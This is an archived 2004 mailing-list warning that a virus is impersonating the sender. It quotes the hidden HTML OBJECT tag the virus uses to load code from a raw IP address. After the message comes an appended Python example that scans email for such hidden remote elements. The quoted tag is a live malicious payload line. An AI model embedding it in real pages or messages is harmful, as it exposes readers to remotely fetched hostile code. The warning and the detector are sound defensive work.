- From: Hallam-Baker, Phillip <pbaker@verisign.com>
- Date: Thu, 18 Mar 2004 06:50:00 -0800
- To: "Hallam-Baker, Phillip" <pbaker@verisign.com>, www-xkms@w3c.org
Received on Thursday, 18 March 2004 09:50:12 UTC
Please, no more messages telling me I have a virus. I don't; this is an impersonation virus. Look at the headers.

Embedded in the message is some active code that goes to a web site; it appears that what it does is to activate a backdoor left by a previous virus.

<OBJECT style="DISPLAY: none" data=http://24.171.136.45:81/617598.php></OBJECT></FONT></BLOCKQUOTE></BODY> </HTML>

My current theory is that MyDoom or the like opens up a backdoor, then the capture messages are sent by the second virus. If you get bit then they start running a phishing scam on your machine.

I have not got complete proof of this yet, but I am working with our anti-phishing team to see if we can find it.

Phill

-----Original Message-----
From: www-xkms-request@w3.org [mailto:www-xkms-request@w3.org] On Behalf Of pbaker@verisign.com
Sent: Thursday, March 18, 2004 1:37 AM
To: www-xkms@w3c.org
Subject: Site changes
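The hidden OBJECT element quoted in the message above is the kind of markup a mail filter can flag before the HTML is ever rendered. The following is an added example, not part of the original message or of any tool it mentions: a Python scanner that reports remote active elements in the HTML parts of a message. The names ActiveContentFinder and scan_message, the reason labels, and the sample message with its 192.0.2.10 documentation address are all constructed for illustration.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Elements that fetch remote content on render, and the attribute holding the URL.
ACTIVE_TAGS = {"object": "data", "iframe": "src", "embed": "src", "script": "src"}
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# Constructed sample message; 192.0.2.10 is a documentation address.
SAMPLE = (
    "From: sender@example.org\nSubject: constructed sample\n"
    "Content-Type: text/html; charset=us-ascii\n\n"
    "<HTML><BODY>Please read."
    '<OBJECT style="DISPLAY: none" data=http://192.0.2.10:81/example.php></OBJECT></BODY></HTML>\n'
)

class ActiveContentFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # list of (url, reasons)

    def handle_starttag(self, tag, attrs):
        attr_map = {k: (v or "") for k, v in attrs}
        raw = attr_map.get(ACTIVE_TAGS.get(tag, ""), "").strip()
        try:
            url = urlsplit(raw)
            port = url.port
        except ValueError:  # malformed authority or port: report rather than skip
            self.findings.append((raw, ["malformed-url"]))
            return
        if url.scheme not in ("http", "https"):
            return  # not an active tag, or a local reference such as cid:
        reasons = ["remote-" + tag]
        if HIDDEN.search(attr_map.get("style", "")):
            reasons.append("hidden")
        if IP_HOST.match(url.hostname or ""):
            reasons.append("ip-literal-host")
        if port not in (None, 80, 443):
            reasons.append("nonstandard-port")
        self.findings.append((raw, reasons))

def scan_message(raw_message):
    finder = ActiveContentFinder()
    for part in message_from_string(raw_message).walk():  # every MIME part
        if part.get_content_type() == "text/html":
            finder.feed((part.get_payload(decode=True) or b"").decode("latin-1"))
    return finder.findings
```

Calling scan_message(SAMPLE) returns one finding carrying all four reasons; a message whose only OBJECT uses a cid: reference, or whose body is text/plain, returns an empty list.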